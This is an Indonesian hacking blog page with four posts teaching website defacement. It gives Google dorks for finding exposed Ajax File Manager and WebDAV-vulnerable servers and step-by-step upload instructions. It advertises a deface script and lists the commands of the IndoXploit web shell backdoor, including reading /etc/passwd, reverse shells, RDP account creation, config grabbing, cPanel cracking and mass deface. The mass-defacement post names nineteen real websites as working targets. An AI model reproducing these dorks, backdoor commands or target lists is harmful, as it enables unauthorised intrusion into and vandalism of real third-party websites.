06/11/17 - Defa Squad

Tempat Belajar Deface

Post Top Ad

Sunday, June 11, 2017

Tutorial Deface : Deface Ajax File Manager [Fresh Dork]

June 11, 2017 0
Banyak orang-orang yang melupakan teknik pepes yang satu ini, mungkin mereka pikir target nya kaga fresh atau mereka anggap teknik ini sudah mati karena target nya kaga perawan di notif ?
Notif-Notif dan Notif yang mereka kejar padahal sih santai aja..

Deface Ajax File Manager [Fresh Dork]
E7B_404

Bahan-Bahan :

# Dork :
  1. intitle:"Ajax File Manager" site:au
  2. inurl:/ajaxfilemanager.php intext:"/Root Folder"
  3. inurl:/ajaxfilemanager.php intext:"upload"
  4. inurl:/ajaxfilemanager.php .ac.
  5. intitle:"index of" intext:"ajaxfilemanager.php"
Kembangkan Lagi Dengan Otak Hentai yang kalian miliki !!! :v (Peace !)
Note : site: boleh di ganti dengan domain atau di hapus
# File txt yang mau di upload
Kalo mau keren pake ASCII aja : klik disini

Step by Step :

1. Sebagai Contoh gw pakai dork yang ke 5. lalu seraching di gugel

2. Setelah sekian lama milih target, gw dapet 1 yang perawan..

Deface Ajax File Manager [Fresh Dork]
Penampakan saat pertama kali buka target nya..

3.  Setelah gw klik tuh file ajaxfilemanager.php, gw langsung berubah jadi power ranger pink !!!!

4. Setelah masuk ke Ajax File Manager nya, kalian klik tombol upload di pojok kanan atas..

5. Pilih file .txt kalian...

Deface Ajax File Manager [Fresh Dork]

6. Setelah berhasil upload akan mucul nama file kalian..

7. Akses file nya gmna ?? ini akan sedikit memakan emosi, energi jiwa dan raga, !! persiapkan mental kalian. :v

8. Arahkan Cursor kalian ke gambar icon file yang telah kalian upload.. (liat gambar)

Deface Ajax File Manager [Fresh Dork]
Di pojok kiri bawah ada link file nya

9. Di Pojok kiri bawah mucul lah link file kalian,, tinggal kalian pikir bagaimana akses nya :v
mau di ketik manual boleh.. mau di diemin juga boleh :v

Ok !! Sekian dlu Coeg.. nanti gw update lagi.. karena gw juga banyak urusan di sekolah..


Big Thanks to : E7B_404 - Garuda Security Hacker

Quote From E7B_404 : "Tak Ada Poc Basi Yang Ada Otak Anda Basi"

sumber : http://blog.garudasecurityhacker.org/2016/08/deface-ajax-file-manager-fresh-dork.html
Read More

Script Deface : phantom Ghost

June 11, 2017 0
                                                                        tampilan awal
                                                                                     
                                                                        tampilan akhir


Demo Disini 

berminat ?
 download source code via pastebin disini
 download script udah jadi via media fire disini


Dapatkan juga Script Deface Lainnya disini

dan selesai sudah
makasihya sudah membaca artikel ini semoga bermanfaat :)
jangan lupa shere ya ke teman kalian

tag : script deface , download script deface , script deface update 2017 , defa squad , script deface phantom ghost , script deface html , script mendeface ,
Read More

Web Shell : IndoXploit Shell First Edition [ V.3 ]

June 11, 2017 0
IndoXploit Shell V.3 menggunakan 'Command Based' atau bisa dibilang untuk menjalankan beberapa tools/fiturnya, kalian harus memasukan command tertentu.
Contoh command untuk memanggil tools 'Adminer'
Login Shell, default password: IndoXploit

 [ List Tools - IndoXploit Shell Backdoor V.3 ]

=============================================
**** COMMAND BASED *****
 - Read File
 usage: rf [filename]
 example: rf /etc/passwd

 - Spawn File/Tools 
 usage: spawn [name]

 [name]
- Adminer (adminer)
 - WebConsole (webconsole)
 - CGI Telnet 1 (cgitelnet1)
 - CGI Telnet 2 (cgitelnet2)
 - PHPINFO (phpinfo)

 example:
 spawn adminer
 spawn webconsole
 spawn cgitelnet1

 - Symlink 
 usage: symlink *[bypass]
 [bypass]
 - 404

 example: symlink 404

- Reverse Shell 
 [Back Connect]
Baca Ju
 usage: rvr bc [IP] [PORT] [TYPE]
 example:
 rvr bc 127.0.0.1 1337 bash
 rvr bc 127.0.0.1 1337 perl

 [Bind Port]
 usage: rvr bp [PORT] [TYPE]
 example:
 rvr bp 1337 bash

 - KRDP - Create RDP Account (for windows server only) 
 usage: krdp

 - Logout From Shell
usage: logout

 - Kill Backdoor 
usage: killme
=============================================
Jumping
Config Grabber
Mass Password Change
Fake Root
Cpanel Crack
Mass Deface/Delete File
- Zone-H Mass Submit


----------------------------
#Link Download: Download
#Git Hub             : Disini 
---------------------------

###############################################################################
Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
Tanpa kalian kita tidak akan BESAR seperti sekarang.
Greetz: 
All Member IndoXploit. & All My Friends.
###############################################################################
Special Thanks: 
Depok Cyber Security | Sanjungan Jiwa | 0x1999
###############################################################################
tag : download shell indoxploit versi terbaru , download web shell indoxploit versi 3 [v3] , download web shell 2017

Read More

Tutorial Deface : Cara Deface Banyak Website Sekaligus menggunakan webdav ( ada vidionya )

June 11, 2017 4


Cara Deface Banyak Website Sekaligus | Sedikit Berbagi pada kesempatan kali ini akan memposting tutorial Cara Deface Banyak Website Sekaligus, ya nantinya kita akan deface website dalam jumlah banyak sekaligus, dalam artian website tersebut masih 1 server. 

Kita disini akan mendeface dengan menggunakan Webdav,,instan sekali pokoknya. gak perlu repot. :D
Pertama siapkan alat tempurnya :

Download Webdav ( hmei7 ) donwloadnya jangan lupa pake Free download manager

  download manager , soalnya kalau download di google chorome pasti failed - network error gan
Reverse Ip ( massip ) 


- Siapkan Halaman untuk Defacenya,,kalau belum punya bisa pake punya saya dipostingan Koleksi Halaman Untuk Deface Website

Ok sekarang kita siap beraksi.
- kita cari target vuln webdav dulu dengan menggunakn dork,ketikan dork ini digoogle   
inurl:/Hmei7.asp;txt site:com   lalu search
kita akan mendapat hasil seperti dibawah,,



yang saya beri tanda itu sebagai contoh target,   wlax.4wmt.com   copy alamatnya lalu masuk ke http://www.yougetsignal.com/tools/web-sites-on-web-server,/  dan pastekan disitu. klik check..
atau bisa juga menggunakan tool massip yang tadi di download 

tapi disini gue pake link di atas , kalau mau yang pake tool bisa liat tutor ( vidio ) di akhir artikel ini :)


maka hasilnya akan seperti dibawh ini,banyak sekali web yang 1 server.



lalu copas alamat web itu dinotepad lalu save dengan ektensi .txt 





Nah buka deh  webdavnya..


1---> copaskan script defacenya disitu
2---> beri nama   dengan awalan /   seperti ini  /bj.html
3---> load file website yang sudah kita save tadi.
4---> Serang...

hasinya seperti ini 

untuk tutorial lewat vidio



live targetnya bang work kok :)

  1. http://www.stech.ac.th/
  2. http://blog.stech.ac.th/
  3. http://aerosurf.com/
  4. http://aerosurf.net/
  5. http://speedband.com/
  6. http://www.ejizdenka.com/
  7. http://akcnijizdenka.cz/
  8. http://akcnijizdenka.eu/
  9. http://www.srovnavacjizdneho.cz/
  10. http://socalinternet.net/
  11. http://artifexed.com/
  12. http://www.irfanmil.it/
  13. http://www.dgxwx.com/
  14. http://www.sungod-lighting.com/
  15. http://158.36.153.158/
  16. http://bestilling.udir.no/
  17. http://www.dgxwx.com/
  18. http://www.sungod-lighting.com/
  19. http://www.e-doc.fte.kmutnb.ac.th/




oke sekian semoga bisa bermanfaat..
jangan lupa tinggalkan komentar..

sumber : http://xblankjacke.blogspot.co.id/2013/08/cara-deface-banyak-website-sekaligus.html
              http://www.shareking-go.net/2017/01/cara-deface-massal.html

tag : tutorial deface menggunakan webdav , cara deface dengan webdav , cara deface massal dengan webdav , cara defacenya mass deface , cara deface 2017 , deface yang work 100% , teknik deface terbaru , cara deface menggunakan hmei7 , cara mengunakan reverse ip / massip , kumpulan web yang vunl webdav , kumpulan web yang sudah di deface 
Read More

Post Top Ad